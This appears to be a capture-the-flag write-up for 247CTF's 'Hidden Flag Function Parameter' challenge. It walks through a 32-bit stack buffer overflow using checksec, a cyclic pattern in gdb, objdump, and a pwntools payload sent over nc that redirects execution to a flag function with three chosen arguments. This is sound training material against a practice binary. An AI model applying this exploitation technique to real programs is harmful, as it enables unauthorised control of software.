This is my write-up of a Pwnable challenge Hidden Flag Function Parameter on the CTF site 247CTF.com.
Can you control this applications flow to gain access to the hidden flag function with the correct parameters?
This one is very similar to Hidden Flag Function, but as we can see in the instructions, we have to also pass the right parameters to get the flag.
I found a lot of good stuff here.
kali@kali:~$ checksec hidden_flag_function_with_args
[*] '/home/kali/hidden_flag_function_with_args'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
We can see that we have 32bit little endian binary with NX enabled.
Lets create a discrete pattern:
kali@kali:~$ msf-pattern_create -l 300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9
Run the binary with gdb (I recommend you to install gef) and paste the pattern obtained in previous step in the input:
kali@kali:~$ gdb -q ./hidden_flag_function_with_args
GEF for linux ready, type `gef' to start, `gef config' to configure
75 commands loaded for GDB 9.1 using Python engine 3.8
[*] 5 commands could not be loaded, run `gef missing` to know why.
Reading symbols from ./hidden_flag_function_with_args...
(No debugging symbols found in ./hidden_flag_function_with_args)
gef➤ r
Starting program: /home/kali/hidden_flag_function_with_args
Sorry, no flag here!
You can ask for one though:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9
Program received signal SIGSEGV, Segmentation fault.
0x37654136 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$eax : 0x1
$ebx : 0x41346541 ("Ae4A"?)
$ecx : 0x0
$edx : 0xf7fb601c → 0x00000000
$esp : 0xffffd4c0 → "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]"
$ebp : 0x65413565 ("e5Ae"?)
$esi : 0xf7fb4000 → 0x001d6d6c
$edi : 0xf7fb4000 → 0x001d6d6c
$eip : 0x37654136 ("6Ae7"?)
$eflags: [zero carry PARITY adjust SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0023 $ss: 0x002b $ds: 0x002b $es: 0x002b $fs: 0x0000 $gs: 0x0063
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0xffffd4c0│+0x0000: "Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag[...]" ← $esp
0xffffd4c4│+0x0004: "e9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5[...]"
0xffffd4c8│+0x0008: "0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A[...]"
0xffffd4cc│+0x000c: "Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag[...]"
0xffffd4d0│+0x0010: "f3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9[...]"
0xffffd4d4│+0x0014: "4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0A[...]"
0xffffd4d8│+0x0018: "Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah[...]"
0xffffd4dc│+0x001c: "f7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3[...]"
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x37654136
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "hidden_flag_fun", stopped 0x37654136 in ?? (), reason: SIGSEGV
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
The program breaks at 0x37654136, so we use msf-pattern_offset, to calculate the offset:
kali@kali:~$ msf-pattern_offset -q 0x37654136
[*] Exact match at offset 140
Now lets check the objdump of the binary, we are searching for cmp instructions, as we know that some parameter conditions have to be met:
kali@kali:~$ objdump -drwC -Mintel -d hidden_flag_function_with_args
...
08048576 <flag>:
8048576: 55 push ebp
8048577: 89 e5 mov ebp,esp
8048579: 53 push ebx
804857a: 81 ec 94 00 00 00 sub esp,0x94
8048580: e8 2b ff ff ff call 80484b0 <__x86.get_pc_thunk.bx>
8048585: 81 c3 7b 1a 00 00 add ebx,0x1a7b
804858b: 81 7d 08 37 13 00 00 cmp DWORD PTR [ebp+0x8],0x1337
8048592: 75 63 jne 80485f7 <flag+0x81>
8048594: 81 7d 0c 47 02 00 00 cmp DWORD PTR [ebp+0xc],0x247
804859b: 75 5a jne 80485f7 <flag+0x81>
804859d: 81 7d 10 78 56 34 12 cmp DWORD PTR [ebp+0x10],0x12345678
80485a4: 75 51 jne 80485f7 <flag+0x81>
...
So the parameter values need to be set to: 0x1337, 0x247 and 0x12345678.
kali@kali:~$ python -c "from pwn import *; print 'a' * 140 + p32("0x08048576")+'P'*4+p32("0x1337")+p32("0x247")+p32("0x12345678")" | nc a1b6b58043ec4527.247ctf.com 50284
Sorry, no flag here!
You can ask for one though:
How did you get here?
Have a flag!
247CTF{xxxx}